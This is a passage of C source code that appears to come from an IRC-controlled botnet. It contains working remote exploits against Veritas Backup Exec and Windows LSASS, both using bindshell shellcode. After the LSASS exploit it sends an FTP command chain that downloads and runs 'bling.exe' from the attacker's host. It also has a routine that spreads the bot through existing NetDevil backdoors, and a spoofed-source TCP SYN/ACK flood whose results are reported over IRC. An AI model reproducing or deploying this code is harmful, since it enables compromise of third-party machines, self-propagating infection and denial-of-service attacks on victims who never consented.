target_ip.sin_port = fhtons(port);
fioctlsocket(sock,FIONBIO,&y);
timeout.tv_sec=tm;
timeout.tv_usec = 0;
if (fconnect(sock, (struct sockaddr *)&target_ip, sizeof(target_ip)) == -1)
{
fd_set writefds;
fd_set exceptfds;
FD_ZERO (&writefds);
FD_ZERO (&exceptfds);
FD_SET (sock, &writefds);
FD_SET (sock, &exceptfds);
fselect(0, NULL, &writefds, &exceptfds, &timeout);
//if (!FDI_ISSET (sock, &writefds))
if (!__fWSAFDIsSet(sock, &writefds))
{
fclosesocket(sock);
return -1;
}
y=0;
fioctlsocket(sock,FIONBIO,&y);
}
return sock;
}
// part of the redirect function, handles sending/recieving for the local connection.
DWORD WINAPI RedirectLoop2Thread(LPVOID param)
{
REDIRECT redirect = *((REDIRECT *)param);
REDIRECT *redirectp = (REDIRECT *)param;
redirectp->cgotinfo = TRUE;
int threadnum=redirect.cthreadnum, err;
char buff[4096];
while (1) {
memset(buff, 0, sizeof(buff));
if ((err = frecv(threads[threadnum].csock, buff, sizeof(buff), 0)) <= 0) break;
if ((err = fsend(threads[threadnum].sock, buff, err, 0)) == SOCKET_ERROR) break;
}
fclosesocket(threads[threadnum].csock);
clearthread(threadnum);
ExitThread(0);
}
bool veritasbackupserver(EXINFO exinfo) {
SOCKET sock;
if ((sock = fsocket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == SOCKET_ERROR) return false;
SOCKADDR_IN sin;
memset(&sin, 0, sizeof(sin));
sin.sin_family = AF_INET;
sin.sin_port = fhtons((unsigned short)exinfo.port);
sin.sin_addr.s_addr = finet_addr(exinfo.ip);
char payload[800];
char v91sp0sp1[]="\xFF\x50\x11\x40";
char esisp0sp1[]="\xA1\xFF\x42\x01";
memcpy(&talk[37], &v91sp0sp1, 4);
memcpy(&talk[72], &esisp0sp1, 4);
//os="Backup Exec v9.1.4691.1\n[+] Backup Exec v9.1.4691.0";
strcpy(payload,veritassc);
if (fconnect(sock, (LPSOCKADDR)&sin, sizeof(sin)) == SOCKET_ERROR) return false;
if (fsend(sock,talk,sizeof(talk)-1,0)==SOCKET_ERROR) return false;
Sleep(10);
for (int i=0; i < 7;i++) {
if (fsend(sock,payload,sizeof(payload),0) == SOCKET_ERROR) return false;
Sleep(10);
}
Sleep(1000);
fclosesocket(sock);
ConnectShell(exinfo,101);
return (AddEx(exinfo,true));
}
int KUANG_Reciev(SOCKET sock)
{
TIMEVAL time;
time.tv_sec = 30; //timeout after 60 sec.
time.tv_usec = 0;
fd_set fd_struct;
FD_ZERO(&fd_struct);
FD_SET(sock, &fd_struct);
if (fselect(0, &fd_struct, NULL, NULL, &time) <= 0) {
fclosesocket(sock);
return -1;
}
memset(k2_buffer,0,sizeof(k2_buffer));
if (frecv(sock, k2_buffer, sizeof(k2_buffer), 0) < 1)
return -1;
if (k2_msg->command == K2_ERROR)
return -1;
return 0;
}
BOOL lsass2(EXINFO exinfo)
{
int i, targetx, len, targetxOS;
char hostipc[40];
char hostipc2[40*2];
char buf[LEN+1];
char sendbuf[(LEN+1)*2];
char req4u[sizeof(reqx4)+20];
char screq[BUFSIZE+sizeof(reqx7)+1500+440];
char screq2k[4348+4060];
char screq2k2[4348+4060];
char recvbuf[1600];
char strasm[]="\x66\x81\xEC\x1C\x07\xFF\xE4";
char strBuffer[BUFSIZE];
char buffer[IRCLINE], cmd_buff[400];
char smblen;
char unclen;
unsigned short port;
SOCKET sSocket, bSocket;
SOCKADDR_IN ssin, bsin;
targetxOS = FpHost(exinfo.ip, FP_RPC);
if ((targetxOS == OS_UNKNOWN) || (targetxOS == OS_WINNT))
return FALSE;
if (targetxOS == OS_WINXP)
targetx = 0;
else if (rand() % 10)
targetx = 1;
else
targetx = 2;
_snprintf(hostipc, sizeof(hostipc),"\\\\%s\\ipc$", exinfo.ip);
for (i=0; i<40; i++) {
hostipc2[i*2] = hostipc[i];
hostipc2[i*2+1] = 0;
}
memcpy(req4u, reqx4, sizeof(reqx4)-1);
memcpy(req4u+48, &hostipc2[0], strlen(hostipc)*2);
memcpy(req4u+47+strlen(hostipc)*2, reqx4+87, 9);
smblen = 52+(char)strlen(hostipc)*2;
memcpy(req4u+3, &smblen, 1);
unclen = 9 + (char)strlen(hostipc)*2;
memcpy(req4u+45, &unclen, 1);
port = fhtons(LSASS_BSPORT)^(USHORT)0x9999;
memcpy(&bindshell[176], &port, 2);
if ((targetx == 1) || (targetx == 2)) {
memset(buf, NOP, LEN);
//memcpy(&buf[2020], "\x3c\x12\x15\x75", 4);
memcpy(&buf[2020], &ttargetx[targetx].jmpaddr, 4);
memcpy(&buf[2036], &bindshell, strlen(bindshell));
memcpy(&buf[2840], "\xeb\x06\xeb\x06", 4);
memcpy(&buf[2844], &ttargetx[targetx].jmpaddr, 4); // jmp ebx addr
//memcpy(&buf[2844], "\x3c\x12\x15\x75", 4); // jmp ebx addr
memcpy(&buf[2856], &bindshell, strlen(bindshell));
for (i=0; i<LEN; i++) {
sendbuf[i*2] = buf[i];
sendbuf[i*2+1] = 0;
}
sendbuf[LEN*2]=0;
sendbuf[LEN*2+1]=0;
memset(screq2k, 0x31, (BUFSIZE+sizeof(reqx7)+1500)*2);
memset(screq2k2, 0x31, (BUFSIZE+sizeof(reqx7)+1500)*2);
} else {
memset(strBuffer, NOP, BUFSIZE);
memcpy(strBuffer+160, bindshell, strlen(bindshell));
memcpy(strBuffer+1980, strasm, strlen(strasm));
*(long *)&strBuffer[1964]=ttargetx[targetx].jmpaddr;
}
memset(screq, 0x31, BUFSIZE+sizeof(reqx7)+1500);
if ((sSocket = fsocket(AF_INET, SOCK_STREAM, IPPROTO_IP)) == SOCKET_ERROR)
return FALSE;
memset(&ssin, 0, sizeof(ssin));
ssin.sin_family = AF_INET;
ssin.sin_port = fhtons((unsigned short)exinfo.port);
ssin.sin_addr.s_addr = finet_addr(exinfo.ip);
if (fconnect(sSocket, (LPSOCKADDR)&ssin, sizeof(ssin)) == -1) {
fclosesocket(sSocket);
return FALSE;
}
if (fsend(sSocket, reqx1, sizeof(reqx1)-1, 0) == SOCKET_ERROR) {
fclosesocket(sSocket);
return FALSE;
}
len = frecv(sSocket, recvbuf, 1600, 0);
if (fsend(sSocket, reqx2, sizeof(reqx2)-1, 0) == SOCKET_ERROR) {
fclosesocket(sSocket);
return FALSE;
}
len = frecv(sSocket, recvbuf, 1600, 0);
if (fsend(sSocket, reqx3, sizeof(reqx3)-1, 0) == SOCKET_ERROR) {
fclosesocket(sSocket);
return FALSE;
}
len = frecv(sSocket, recvbuf, 1600, 0);
if (fsend(sSocket, req4u, smblen+4, 0) == SOCKET_ERROR) {
fclosesocket(sSocket);
return FALSE;
}
len = frecv(sSocket, recvbuf, 1600, 0);
if (fsend(sSocket, reqx5, sizeof(reqx5)-1, 0) == SOCKET_ERROR) {
fclosesocket(sSocket);
return FALSE;
}
len = frecv(sSocket, recvbuf, 1600, 0);
if (fsend(sSocket, reqx6, sizeof(reqx6)-1, 0) == SOCKET_ERROR) {
fclosesocket(sSocket);
return FALSE;
}
len = frecv(sSocket, recvbuf, 1600, 0);
if ((targetx == 1) || (targetx == 2)) {
memcpy(screq2k, reqx8, sizeof(reqx8)-1);
memcpy(screq2k+sizeof(reqx8)-1, sendbuf, (LEN+1)*2);
memcpy(screq2k2, reqx9, sizeof(reqx9)-1);
memcpy(screq2k2+sizeof(reqx9)-1, sendbuf+4348-sizeof(reqx8)+1, (LEN+1)*2-4348);
memcpy(screq2k2+sizeof(reqx9)-1+(LEN+1)*2-4348-sizeof(reqx8)+1+206, shitx3, sizeof(shitx3)-1);
if (fsend(sSocket, screq2k, 4348, 0) == SOCKET_ERROR) {
fclosesocket(sSocket);
return FALSE;
}
len = frecv(sSocket, recvbuf, 1600, 0);
if (fsend(sSocket, screq2k2, 4060, 0) == SOCKET_ERROR) {
fclosesocket(sSocket);
return FALSE;
}
} else {
memcpy(screq, reqx7, sizeof(reqx7)-1);
memcpy(screq+sizeof(reqx7)-1, &strBuffer[0], BUFSIZE);
memcpy(screq+sizeof(reqx7)-1+BUFSIZE, shitx1, 9*16);
screq[BUFSIZE+sizeof(reqx7)-1+1500-304-1] = 0;
if (fsend(sSocket, screq, BUFSIZE+sizeof(reqx7)-1+1500-304, 0) == SOCKET_ERROR) {
fclosesocket(sSocket);
return FALSE;
}
}
len = frecv(sSocket, recvbuf, 1600, 0);
if ((bSocket = fsocket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == SOCKET_ERROR) {
fclosesocket(sSocket);
return FALSE;
}
memset(&bsin, 0, sizeof(bsin));
bsin.sin_family = AF_INET;
bsin.sin_port = fhtons(LSASS_BSPORT);
bsin.sin_addr.s_addr = finet_addr(exinfo.ip);
if (fconnect(bSocket, (LPSOCKADDR)&bsin, sizeof(bsin)) == -1) {
fclosesocket(sSocket);
fclosesocket(bSocket);
return FALSE;
}
if (frecv(bSocket, recvbuf, 1600, 0) > 0) {
Sleep(500);
_snprintf(cmd_buff, sizeof(cmd_buff),
// "tftp -i %s get %s&%s&exit\n", GetIP(exinfo.sock), filename, filename);
"echo open %s %d > o&echo user 1 1 >> o &echo get bling.exe >> o &echo quit >> o &ftp -n -s:o &bling.exe\r\n",
GetIP(exinfo.sock),FTP_PORT);
if (fsend(bSocket, cmd_buff, strlen(cmd_buff), 0) == SOCKET_ERROR) {
fclosesocket(sSocket);
fclosesocket(bSocket);
return FALSE;
}
fclosesocket(sSocket);
fclosesocket(bSocket);
_snprintf(buffer, sizeof(buffer), "[%s]: Exploiting IP: %s.", exploit[exinfo.exploit].name, exinfo.ip);
if (!exinfo.silent)
irc_privmsg(exinfo.sock, exinfo.chan, buffer, exinfo.notice);
addlog(buffer);
exploit[exinfo.exploit].stats++;
return TRUE;
} else
return FALSE;
}
int NetDevil_Upload(char *IP, SOCKET ssock)
{
SOCKET nsock;
char buffer[1024], botfile[MAX_PATH], rFile[MAX_PATH];
int port = 0,bytes_sent = 0;
unsigned int Fsend = 1024, Fsize, move;
DWORD mode = 0;
BOOL ver15 = FALSE;
GetModuleFileName(NULL, botfile, sizeof(botfile));
fsend(ssock, "version", 7, 0);
memset(buffer,0,sizeof(buffer));
frecv(ssock, buffer, sizeof(buffer), 0);
if (strlen(buffer) > 5) {
buffer[strlen(buffer)-2] = '\0';
char *uPort = strrchr(buffer, '\n\r');
if (uPort != NULL)
port = atoi(uPort);
}
char *ver = strtok(buffer,"\n\r");
if (strcmp(buffer,"ver1.5") == 0)
ver15 = TRUE;
sprintf(rFile,"C:\\%s",filename);
port = ((port == 0)?(903):(port));
if ((nsock = CreateSock(IP,port)) == INVALID_SOCKET)
goto end;
HANDLE testfile;
if ((testfile = CreateFile(botfile,GENERIC_READ,FILE_SHARE_READ,0,OPEN_EXISTING,0,0)) == INVALID_HANDLE_VALUE)
goto end;
Fsize = GetFileSize(testfile,NULL);
if (ver15)
sprintf(buffer,"cmd[003]%s|%i|\n\r",rFile,Fsize);
else
sprintf(buffer,"%s\r1",rFile);
fsend(nsock, buffer, strlen(buffer), 0);
if (frecv(nsock, buffer, sizeof(buffer), 0) < 1)
goto end;
while (Fsize) {
memset(buffer,0,sizeof(buffer));
if (Fsend>Fsize)
Fsend=Fsize;
move = 0-Fsize;
SetFilePointer(testfile, move, NULL, FILE_END);
ReadFile(testfile, buffer, Fsend, &mode, NULL);
bytes_sent = fsend(nsock, buffer, Fsend, 0);
if (bytes_sent == SOCKET_ERROR) {
if (fWSAGetLastError() != WSAEWOULDBLOCK)
goto end;
else
bytes_sent = 0;
}
Fsize = Fsize - bytes_sent;
if (!ver15 && frecv(nsock, buffer, sizeof(buffer), 0) < 1)
goto end;
}
if (testfile != INVALID_HANDLE_VALUE)
CloseHandle(testfile);
fclosesocket(nsock);
Sleep(2000);
sprintf(buffer,"pleaz_run%s",rFile);
fsend(ssock, buffer,strlen(buffer), 0);
memset(buffer,0,sizeof(buffer));
if (frecv(nsock, buffer, sizeof(buffer), 0) < 1)
goto end;
if (strcmp(buffer,"pleaz_run_done") != 0)
goto end;
Sleep(4000);
fclosesocket(ssock);
return 1;
end:;
fclosesocket(nsock);
fclosesocket(ssock);
return 0;
}
DWORD WINAPI TcpFloodThread(LPVOID param)
{
TCPFLOOD tcpflood = *((TCPFLOOD *)param);
TCPFLOOD *tcpfloods = (TCPFLOOD *)param;
tcpfloods->gotinfo = TRUE;
char sendbuf[IRCLINE], szSendBuf[60]={0};
IPHEADER ipHeader;
TCPHEADER tcpHeader;
PSDHEADER psdHeader;
srand(GetTickCount());
SOCKET ssock;
if ((ssock=fsocket(AF_INET,SOCK_RAW,IPPROTO_RAW)) == INVALID_SOCKET) {
sprintf(sendbuf,"[TCP]: Error: socket() failed, returned: <%d>.", fWSAGetLastError());
if (!tcpflood.silent) irc_privmsg(tcpflood.sock,tcpflood.chan,sendbuf,tcpflood.notice);
addlog(sendbuf);
clearthread(tcpflood.threadnum);
ExitThread(0);
}
BOOL flag = TRUE;
if (fsetsockopt(ssock, IPPROTO_IP, IP_HDRINCL, (char *)&flag, sizeof(flag)) == SOCKET_ERROR) {
sprintf(sendbuf,"[TCP]: Error: setsockopt() failed, returned: <%d>.", fWSAGetLastError());
if (!tcpflood.silent) irc_privmsg(tcpflood.sock,tcpflood.chan,sendbuf,tcpflood.notice);
addlog(sendbuf);
clearthread(tcpflood.threadnum);
ExitThread(0);
}
if (finet_addr(tcpflood.ip) == INADDR_NONE) {
sprintf(sendbuf,"[TCP]: Invalid target IP.");
if (!tcpflood.silent) irc_privmsg(tcpflood.sock,tcpflood.chan,sendbuf,tcpflood.notice);
addlog(sendbuf);
clearthread(tcpflood.threadnum);
ExitThread(0);
}
SOCKADDR_IN ssin;
memset(&ssin, 0, sizeof(ssin));
ssin.sin_family=AF_INET;
ssin.sin_port=fhtons(0);
ssin.sin_addr.s_addr=finet_addr(tcpflood.ip);
int sent = 0;
unsigned long start = GetTickCount();
while (((GetTickCount() - start) / 1000) <= (unsigned long)tcpflood.time) {
ipHeader.verlen=(4<<4 | sizeof(ipHeader)/sizeof(unsigned long));
ipHeader.total_len=fhtons(sizeof(ipHeader)+sizeof(tcpHeader));
ipHeader.ident=1;
ipHeader.frag_and_flags=0;
ipHeader.ttl=128;
ipHeader.proto=IPPROTO_TCP;
ipHeader.checksum=0;
ipHeader.sourceIP=((tcpflood.spoof)?(rand()+(rand()<<8)+(rand()<<16)+(rand()<<24)):(finet_addr(GetIP(tcpflood.sock))));
ipHeader.destIP=ssin.sin_addr.s_addr;
((tcpflood.port == 0)?(tcpHeader.dport=fhtons((unsigned short)(rand()%1025))):(tcpHeader.dport=fhtons(tcpflood.port)));
tcpHeader.sport=fhtons((unsigned short)(rand()%1025));
tcpHeader.seq=fhtonl(0x12345678);
if (strstr(tcpflood.type,"syn")) {
tcpHeader.ack_seq=0;
tcpHeader.flags=SYN;
} else if (strstr(tcpflood.type,"ack")) {
tcpHeader.ack_seq=0;
tcpHeader.flags=ACK;
} else if (strstr(tcpflood.type,"random")) {
tcpHeader.ack_seq=rand()%3;
((rand()%2 == 0)?(tcpHeader.flags=SYN):(tcpHeader.flags=ACK));
}
tcpHeader.lenres=(sizeof(tcpHeader)/4<<4|0);
tcpHeader.window=fhtons(512);
tcpHeader.urg_ptr=0;
tcpHeader.checksum=0;
psdHeader.saddr=ipHeader.sourceIP;
psdHeader.daddr=ipHeader.destIP;
psdHeader.zero=0;
psdHeader.proto=IPPROTO_TCP;
psdHeader.length=fhtons((unsigned short)(sizeof(tcpHeader)));
memcpy(szSendBuf, &psdHeader, sizeof(psdHeader));
memcpy(szSendBuf+sizeof(psdHeader), &tcpHeader, sizeof(tcpHeader));
tcpHeader.checksum=checksum((USHORT *)szSendBuf,sizeof(psdHeader)+sizeof(tcpHeader));
memcpy(szSendBuf, &ipHeader, sizeof(ipHeader));
memcpy(szSendBuf+sizeof(ipHeader), &tcpHeader, sizeof(tcpHeader));
memset(szSendBuf+sizeof(ipHeader)+sizeof(tcpHeader), 0, 4);
ipHeader.checksum=checksum((USHORT *)szSendBuf, sizeof(ipHeader)+sizeof(tcpHeader));
memcpy(szSendBuf, &ipHeader, sizeof(ipHeader));
if (fsendto(ssock, (char *)&szSendBuf, sizeof(szSendBuf), 0, (LPSOCKADDR)&ssin, sizeof(ssin)) == SOCKET_ERROR) {
fclosesocket(ssock);
_snprintf(sendbuf,sizeof(sendbuf),"[TCP]: Error sending packets to IP: %s. Packets sent: %d. Returned: <%d>.", tcpflood.ip, sent, fWSAGetLastError());
if (!tcpflood.silent) irc_privmsg(tcpflood.sock, tcpflood.chan, sendbuf, tcpflood.notice);
addlog(sendbuf);
clearthread(tcpflood.threadnum);
ExitThread(0);
}
sent++;
}
fclosesocket(ssock);
sprintf(sendbuf,"[TCP]: Done with %s flood to IP: %s. Sent: %d packet(s) @ %dKB/sec (%dMB).", tcpflood.type, tcpflood.ip, sent, (((sent * sizeof(szSendBuf)) / 1024) / tcpflood.time), (((sent * sizeof(szSendBuf)) / 1024) / 1024));
if (!tcpflood.silent) irc_privmsg(tcpflood.sock, tcpflood.chan, sendbuf, tcpflood.notice);
addlog(sendbuf);
clearthread(tcpflood.threadnum);
ExitThread(0);
}
